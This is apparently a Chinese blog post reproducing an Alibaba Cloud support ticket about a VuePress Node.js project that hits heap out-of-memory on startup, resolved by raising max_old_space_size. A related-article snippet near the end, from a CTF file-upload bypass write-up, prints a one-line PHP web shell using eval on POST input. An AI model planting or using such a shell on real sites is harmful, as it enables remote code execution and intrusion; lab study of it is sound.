阿里云项目启动OOM问题解决

#1024程序员节|征文#
在这里插入图片描述

问题描述

随着项目业务的增长,系统启动时内存紧张,每次第一次启动的时候就会出现oom第二次或者第n的时候,就启动成功了。

带着这个疑问,我就在阿里云上提交了工单,咨询为什么第一次提交失败但是后面却能提交成功尼?

解决方案

就按照提交工单的时间线看看就行:

问题描述

[10018:0x1b45650]    64727 ms: Mark-sweep 863.6 (895.3) -> 857.2 (895.6) MB, 312.0 / 0.4 ms  (average mu = 0.272, current mu = 0.172) allocation failure scavenge might not succeed
[10018:0x1b45650]    65096 ms: Mark-sweep 865.3 (895.6) -> 858.1 (896.1) MB, 302.1 / 0.4 ms  (average mu = 0.229, current mu = 0.181) allocation failure scavenge might not succeed


<--- JS stacktrace --->

FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory

售后工程师
2024-09-22 00:02:10
已收到您提交的问题

售后工程师
2024-09-22 00:02:36
请问这个报错是什么地方输出的,麻烦详细描述下并提供服务器ip。

真累什么名字都不能用 – 这是我的用户名
2024-09-22 10:45:27
公网IP 00.100.100.00(这个我还是要处理下的)
启动node项目的时候报出来的

售后工程师
2024-09-22 11:11:12
从报错信息来看是内存不足,您可以free -m看下系统自身内存是否充足,系统内存充足的情况下,检查下程序是否有最大内存限制等导致启动报错,可以根据报错信息外站搜索相关参考案例排查下,修改程序之前建议优先做好备份

售后工程师
2024-09-22 14:39:32
您好,如您暂无其他问题,请关闭下工单。后续有新的问题可以提交新的工单联系我们,感谢您的支持。

真累什么名字都不能用
2024-09-23 17:55:24
swap 的内存很足,怎么swap到磁盘上

# free -m
              total        used        free      shared  buff/cache   available
Mem:           1756        1426          63           0         266         169
Swap:          2047          72        1975

售后工程师
2024-09-23 18:22:32
您好,请问您是指swap扩大?还是什么意思呢?能否详细描述下呢

售后工程师
2024-09-24 09:55:48
尊敬的客户,请您关注工单回复并进行验证,您可以在3天内继续反馈此工单与我们联系。如遇其它问题您可以提交新工单反馈。感谢您的支持!(如果您在工单中提供了账号密码等敏感信息,请您及时修改)

真累什么名字都不能用
2024-09-24 14:18:16
这个错误是项目启动的时候报的错误,内存不足溢了,为了解决内存不足可以使用swap机制,将部分数据swap到磁盘保证项目正常启动。

现在是我的项目启动的时候,第一次都会oom第二次就能正常启动成功,不符合常理。要么每次都失败要么一次就成功。

售后工程师
2024-09-24 14:48:23
您好,oom 是因为您的业务有内存溢出的问题,这个您得从业务侧去查看呢,从您上面命令反馈看配置了2G的Swap,swap使用并不多,有可能是swap分配的并不合理,您可以考虑增大swap,或者调整应用程序的内存使用策略进行优化的。

售后工程师
2024-09-25 01:01:10
尊敬的客户,一直未等到您的回复先将工单置为待确认状态,您可以在3天内继续反馈此工单与我们联系。如遇其它问题您可以提交新工单反馈。感谢您的支持!(如果您在工单中提供了账号密码等敏感信息,请您及时修改,同时建议定期做好数据备份)

真累什么名字都不能用
2024-09-26 15:59:33
Swap他是不用分配的,如果内存不足就会swap到磁盘。 第一次报错,第二次启动成功,这个也不正常呀!

售后工程师
2024-09-26 16:03:41
请稍等,这边看下。

售后工程师
2024-09-26 16:55:21
您好

1麻烦您在程序启动失败时在服务器内部执行下free -m

2然后请您在程序启动成功后,也在服务器内部执行下free -m

请您提供下两次的截图,这边看下,谢谢

真累什么名字都不能用
2024-09-28 15:28:40
第一次启动失败的报文:
在这里插入图片描述

第二次启动成功的报文
image.png

售后工程师
2024-09-28 16:14:49
您好,前后两次的swap分区使用情况看差异不大的,区别看是物理内存使用量不同,可用内存也不同

swap的使用是系统管理的,配置了swap分区,即使将vm.swappiness 设置为100 也并不能保证一定能使用到swap分区的,建议您可以考虑将swap分区增大下,并优化下node程序启动申请的内存最大大小再看下
在这里插入图片描述
在这里插入图片描述

真累什么名字都不能用
2024-10-02 16:35:31
我知道应该优化项目启动占用的内存大小,知识郁闷的是为什么第一次和第二次存在区别。

售后工程师
2024-10-02 17:09:05
您好,您也查看下问题时间服务器messages日志看有报错记录吗,此情况应是开始没有使用swap的,swap和真实内存使用是有区别的,是否使用swap是系统侧进行决定。

真累什么名字都不能用
2024-10-03 15:34:09
刚次1次启动就成功了,很奇怪

售后工程师
2024-10-03 15:56:59
您好,建议您使用观察下,如果后续启动报错您也检查下messages系统日志看下是否有错误记录。
真累什么名字都不能用

2024-10-04 10:31:16
大清早起来项目第一次崩掉了。。。。。
image.png

真累什么名字都不能用
2024-10-04 10:33:35
怎么演变成了,运行一段时间,自动oom了,这谁扛得住

<--- Last few GCs --->

[25560:0x21b3650]  9596697 ms: Mark-sweep 876.0 (893.3) -> 874.5 (893.3) MB, 265.6 / 0.3 ms  (average mu = 0.931, current mu = 0.908) allocation failure scavenge might not succeed
[25560:0x21b3650]  9603818 ms: Mark-sweep 876.2 (893.3) -> 874.5 (893.6) MB, 351.2 / 0.4 ms  (average mu = 0.944, current mu = 0.951) allocation failure scavenge might not succeed


<--- JS stacktrace --->

FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
 1: 0x7fd1989ead78 node::Abort() [/lib64/libnode.so.93]
 2: 0x7fd1988d8a73  [/lib64/libnode.so.93]
 3: 0x7fd199be8a20 v8::Utils::ReportOOMFailure(v8::internal::Isolate*, char const*, bool) [/lib64/libnode.so.93]
 4: 0x7fd199be8de7 v8::internal::V8::FatalProcessOutOfMemory(v8::internal::Isolate*, char const*, bool) [/lib64/libnode.so.93]
 5: 0x7fd199da87e5  [/lib64/libnode.so.93]
 6: 0x7fd199dbe654  [/lib64/libnode.so.93]
 7: 0x7fd199dc0749 v8::internal::Heap::AllocateRawWithLightRetrySlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [/lib64/libnode.so.93]
 8: 0x7fd199dc07d7 v8::internal::Heap::AllocateRawWithRetryOrFailSlowPath(int, v8::internal::AllocationType, v8::internal::AllocationOrigin, v8::internal::AllocationAlignment) [/lib64/libnode.so.93]
 9: 0x7fd199d80fcd v8::internal::Factory::NewFillerObject(int, bool, v8::internal::AllocationType, v8::internal::AllocationOrigin) [/lib64/libnode.so.93]
10: 0x7fd19a11958a v8::internal::Runtime_AllocateInYoungGeneration(int, unsigned long*, v8::internal::Isolate*) [/lib64/libnode.so.93]
11: 0x7fd199ae3d19  [/lib64/libnode.so.93]

售后工程师
2024-10-04 11:32:17
您好,查看报错是和内存不足有关的,您程序是java相关的话,java的XMX 参数设置的多少,有指定吗,如果是默认配置,可以考虑对XMX设置为1个G观察下

真累什么名字都不能用
2024-10-08 12:43:26
项目是vuepress项目

服务助手
2024-10-09 22:35:27
i-uf65h6i43ltlzhqolumy
d-uf6j9l10qgp2yr97o20n(系统盘). (这个时候给阿里云授权了)

真累什么名字都不能用
2024-10-09 22:35:27
已操作授权

售后工程师
2024-10-10 01:03:59
您好,请问您的这个程序如何启动,配置文件路径麻烦也提供一下,另外您的这个程序属于第三方软件超出了阿里云的服务范围这边会尽力帮您尝试排查下但是无法保证可以解决,这个请了解,谢谢

真累什么名字都不能用
2024-10-11 11:06:16
screen -r -d

npm run docs:dev
售后工程师
2024-10-11 11:44:13
您好,刚刚尝试与您电话,但是电话没有接通

screen -r -d后出现了附件中的提示,麻烦您看下,谢谢
在这里插入图片描述
真累什么名字都不能用
2024-10-11 20:19:02
你干啥了,搞坏了

真累什么名字都不能用
2024-10-11 20:19:53
刚他们说网站崩掉了

服务助手
2024-10-11 20:24:04
真累什么名字都不能用
2024-10-11 20:39:18
Ctrl+a+d 可以退出 窗口管理器,查看服务器的信息, screen -r -d 是打开我程序运行窗口,不能终止的,终止了系统就挂了。

售后工程师
2024-10-11 23:56:38
您好,抱歉给您使用带来不便,您提供启动程序命令后,没有和您确认执行命令的影响,执行 screen -r -d 后 没有什么反应,当时尝试电话联系您核实情况也没有联系通,不清楚是否会影响到您网站。
关于您反馈的网站情况,专员已和您电话沟通,给您带来不便请谅解。

真累什么名字都不能用
2024-10-12 21:38:00
造成的损失你我一块承担一些吧

售后工程师
2024-10-12 22:02:44
您好,您反馈的问题我们已经记录并转交给后端专项处理人员,核实需要些时间,请您耐心等待,有结果我们会第一时间反馈。

售后工程师
2024-10-13 11:32:17
您好,您反馈的问题预计周一工作时间专员会和您联系沟通。

真累什么名字都不能用
2024-10-13 15:10:29
好的

售后工程师
2024-10-13 15:16:43
届时会有专员跟您联系沟通,有其他问题您随时反馈。

售后工程师
2024-10-14 17:22:07
您好

1 关于损失的情况,专员已和您电话沟通好方案,给您账号补偿500元代金券,已经发放完成,请您查看。

2 服务器里网站应用程序出现out of memory的问题,建议优化程序的内存使用,或者考虑给服务器升级配置增加内存。

3 对于第一次启动程序会出现out of memory,第二次启动程序就正常的情况,目前还没有排查到原因,如果要继续排查,避免影响您网站使用,请您给服务器创建一个镜像,把镜像共享给我们的测试账号(1833241755205400),我们用测试账号创建服务器进行分析排查看看,因为升级到第三方应用程序,也不能保证一定可以查到原因。

使用实例创建自定义镜像 https://help.aliyun.com/zh/ecs/user-guide/create-a-custom-image-from-an-instance?spm=a2c4g.11186623.0.i0

共享自定义镜像 https://help.aliyun.com/zh/ecs/user-guide/share-a-custom-image?spm=a2c4g.11186623.0.i3

真累什么名字都不能用
2024-10-14 18:25:11
这个创建镜像的流程看着比较麻烦,我晚上搞一下,谢谢

售后工程师
2024-10-14 19:00:17
好的,有问题,请您再反馈,谢谢

真累什么名字都不能用
2024-10-14 23:24:28
镜像已经创建好了,镜像名:Created_from_i-uf65h6i43ltlzhqolumy
售后工程师
2024-10-15 00:38:41
您好

请您参考:https://help.aliyun.com/zh/ecs/user-guide/share-a-custom-image?spm=a2c4g.11186623.0.i3 将您创建的镜像共享到这个1833241755205400账号的上海地域,共享完成后,请您工单反馈下,谢谢
真累什么名字都不能用
2024-10-17 12:37:37
o , 已经创建好了,忘记回复了

售后工程师
2024-10-17 13:02:37
您好,您的问题正在核实,请您不要关闭工单,等待我们进一步答复,谢谢

售后工程师
2024-10-17 14:05:39
您好,npm run docs:dev 是需要先切换到某一路径下在执行吗,目前登录测试服务器后多次执行查看均提示报错。
image.png

服务助手
2024-10-20 14:05:39

真累什么名字都不能用
2024-10-21 11:01:15
打电话聊聊?

真累什么名字都不能用
2024-10-21 11:02:52
主窗口用来执行命令的,使用 screen -r -d 开启了一个新窗口用来启动服务的。这个窗口进去的时候,就是系统运行的窗口,ctrl+c停止运行,但是必须5分钟内启动起来。 npm run docs:dev 启动项目

售后工程师
2024-10-21 12:19:42
您好

刚刚与您电话,您目前不确定再测试机上执行命令是否会影响您的网站,需要执行命令前提前与您确认下.

后续这边操作前会提前与您联系的,您稍等
售后工程师
2024-10-21 12:47:02
.
售后工程师
2024-10-21 13:17:51
您好,您的问题正在为您处理中,请您耐心等待回复。

售后工程师
2024-10-21 13:51:02
您好,经排查分析结果如下:
原因分析:报错原因是Node.js 的 max_old_space_size 设置太小而无法构建此应用程序。 您可以尝试通过设置 NODE_OPTIONS 环境变量来增加 max_old_space_size。
max_old_space_size 以 MB 为单位,默认情况下 max_old_space_size 是机器内存大小的一半。该值可以大于你机器的实际内存大小。
全文核心
解决方法:
先执行export NODE_OPTIONS=–max_old_space_size=2048 后,再执行npm run docs:dev 启动项目

我们多次在测试机上测试,问题可以解决。

售后工程师
2024-10-21 14:55:38
尊敬的客户,请您关注工单回复并进行验证,您可以在3天内继续反馈此工单与我们联系。如遇其它问题您可以提交新工单反馈。感谢您的支持!(如果您在工单中提供了账号密码等敏感信息,请您及时修改)

真累什么名字都不能用
2024-10-22 09:55:10
好的,我今天操作一下,么问题的话,我就关了,非常感谢
售后工程师

2024-10-22 09:57:00
您好,不客气。

真累什么名字都不能用
2024-10-23 22:12:02
嗯,可以了,谢谢

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/899237.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

WIFI、NBIOT、4G模块调试AT指令连接华为云物联网服务器(MQTT协议)

一、前言 随着物联网&#xff08;IoT&#xff09;技术的飞速发展&#xff0c;越来越多的设备开始连接到互联网&#xff0c;形成了一个万物互联的世界。在这个背景下&#xff0c;设备与云端之间的通讯变得尤为重要。 本文将探讨几种常见的无线通信模块——EC20-4G、Air724ug-4…

CTFHUB技能树之文件上传——MIME绕过

开启靶场&#xff0c;打开链接&#xff1a; 直接指明是MIME验证 新建04MIME.php文件&#xff0c;内容如下&#xff1a; <?php echo "Ciallo&#xff5e;(∠・ω< )⌒★";eval($_POST[pass]);?> &#xff08;这里加了点表情&#xff0c;加带点私货&#x…

传感器驱动系列之PAW3212DB鼠标光电传感器

目录 一、PAW3212DB鼠标光电传感器简介 1.1 主要特点 1.2 引脚定义 1.3 传感器组装 1.4 应用场景 1.5 传感器使用注意 1.5.1 供电选择 1.5.2 SPI读写设置 1.5.3 MOTION引脚 1.6 寄存器说明 1.6.1 Product_ID1寄存器 1.6.2 MOTION_Status寄存器 1.6.3 Delta_X寄存器…

GRU神经网络理解

全文参考以下B站视频及《神经网络与深度学习》邱锡鹏&#xff0c;侧重对GPU模型的理解&#xff0c;初学者入门自用记录&#xff0c;有问题请指正【重温经典】GRU循环神经网络 —— LSTM的轻量级版本&#xff0c;大白话讲解_哔哩哔哩_bilibili 更新门、重置门、学习与输出 注&a…

Go通过gorm连接sqlserver报错TLS Handshake failed

Go通过gorm连接sqlserver报错TLS Handshake failed [error] failed to initialize database, got error TLS Handshake failed: tls: server selected unsupported protocol version 301 panic: TLS Handshake failed: tls: server selected unsupported protocol version 301 …

综合小程序的设计

熟悉python可视化的设计 完成综合小程序的设计。 登录系统设计 from tkinter import * import tkinter.messagebox def onClick(): namebname.get() pwdbpwd.getO() if (namezhou and pwd123): tkinter.messagebox.showinfo(title提示,message登陆成功&a…

Linux 中 .bash_history、.bash_logout 等用户配置文件

目录 前言.bash_history.bash_logout.bash_profile.bashrc.cshrc.tcshrc.viminfo 总结 前言 在 Linux 中我们经常会看见用户家目录下存在 .bash_history、.bash_logout、.bash_profile、.bashrc、.cshrc、.tcshrc、.viminfo 这写文件&#xff0c;那它们区别是什么呢&#xff1…

2024软考网络工程师笔记 - 第8章.网络安全

文章目录 网络安全基础1️⃣网络安全威胁类型2️⃣网络攻击类型3️⃣安全目标与技术 &#x1f551;现代加密技术1️⃣私钥密码/对称密码体制2️⃣对称加密算法总结3️⃣公钥密码/非对称密码4️⃣混合密码5️⃣国产加密算法 - SM 系列6️⃣认证7️⃣基于公钥的认证 &#x1f552…

Unity CRP学习笔记(一)

Unity CRP学习笔记&#xff08;一&#xff09; 主要参考&#xff1a; https://catlikecoding.com/unity/tutorials/custom-srp/ https://docs.unity.cn/cn/2022.3/ScriptReference/index.html 中文教程部分参考&#xff08;可选&#xff09;&#xff1a; https://tuncle.blog/c…

算力的定义、单位、影响因素、提升方法、分类、应用等。附超算排名

文章目录 算力的定义算力的单位FLOPS&#xff08;Floating Point Operations Per Second&#xff0c;浮点运算次数/秒&#xff09;IPS&#xff08;Instructions Per Second&#xff0c;指令/秒&#xff09;TOPS&#xff08;Trillion Operations Per Second&#xff0c;万亿次/秒…

Win10系统安装docker操作步骤

Docker下载 docker下载地址&#xff1a;Docker: Accelerated Container Application Development 打开网页后&#xff0c;点击图下所示&#xff0c;下载windows版本的docker 启用Hyper-V 和容器特性 右键左下角windows图标&#xff0c;选择应用和功能 然后在下面的界面中&am…

【Nuvoton干货分享】开发应用篇 4 -- 8bit MCU Flash 操作

我们在进行实际开发设计中&#xff0c;难免需要进行数据存储&#xff0c;早期很多都是外接EEPROM来进行设计&#xff0c;但是需要增加成本。其实芯片内部的Flash也是可以当成数据存储空间的。本章节主要介绍新唐的8位机如何进行常量数据的存储操作。 一、存储空间划分 我这边…

w~自动驾驶合集6

我自己的原文哦~ https://blog.51cto.com/whaosoft/12286744 #自动驾驶的技术发展路线 端到端自动驾驶 Recent Advancements in End-to-End Autonomous Driving using Deep Learning: A SurveyEnd-to-end Autonomous Driving: Challenges and Frontiers 在线高精地图 HDMa…

小程序无法获取头像昵称以及手机号码

用户在使用小程序的时候&#xff0c;登录弹出获取昵称头像或者个人中心点击默认头像弹窗获取头像昵称的时候&#xff0c;点击弹窗中的头像昵称均无反应&#xff0c; 这个是因为你的小程序隐私政策没有更新&#xff0c;或者老版本没有弹窗让用户同意导致的 解决办法&#xff1…

利用彩色相机给激光点云染色

文章目录 概述核心代码效果概述 在激光SLAM(Simultaneous Localization and Mapping)中,使用彩色相机为激光点云染色是一个常见的做法。这种技术结合了激光雷达的高精度距离测量和相机的丰富色彩信息,使得生成的点云不仅包含空间位置信息,还包含颜色信息,从而更直观和细…

【OpenAI】第六节(语音生成与语音识别技术)从 ChatGPT 到 Whisper 的全方位指南

前言 在人工智能的浪潮中&#xff0c;语音识别技术正逐渐成为我们日常生活中不可或缺的一部分。随着 OpenAI 的 Whisper 模型的推出&#xff0c;语音转文本的过程变得前所未有的简单和高效。无论是从 YouTube 视频中提取信息&#xff0c;还是将播客内容转化为文本&#xff0c;…

[实时计算flink]数据摄入YAML作业快速入门

实时计算Flink版基于Flink CDC&#xff0c;通过开发YAML作业的方式有效地实现了将数据从源端同步到目标端的数据摄入工作。本文介绍如何快速构建一个YAML作业将MySQL库中的所有数据同步到StarRocks中。 前提条件 已创建Flink工作空间&#xff0c;详情请参见开通实时计算Flink版…

Jenkins配置CI/CD开发环境(理论到实践的完整流程)

目录 一、对于CI/CD的理解1.1、什么是CI&#xff08;持续集成&#xff09;1.2、CI 的主要特点&#xff1a;1.3、CI 的优势&#xff1a;**实际开发中的场景举例:** 1.4、什么是 CD&#xff08;持续交付和持续部署&#xff09;1.5、持续交付&#xff08;Continuous Delivery&…

鸿蒙HarmonyOS NEXT 5.0开发(2)—— ArkUI布局组件

文章目录 布局Column&#xff1a;从上往下的布局Row&#xff1a;从左往右的布局Stack&#xff1a;堆叠布局Flex&#xff1a;自动换行或列 组件Swiper各种选择组件 华为官方教程B站视频教程 布局 主轴和交叉轴的概念&#xff1a; 对于Column布局而言&#xff0c;主轴是垂直方…

如何区分真假Facebook三不限海外户?

对于需要推广到海外的企业来说&#xff0c;Facebook是一个重要的渠道。由于Facebook对国内普通企业户的风控极为严格&#xff0c;让不少出海广告主都很头疼&#xff0c;一到要出量的时刻就限额、挂户各种问题&#xff0c;根本没有办法跑起来量&#xff0c;白白错过好时机。对于…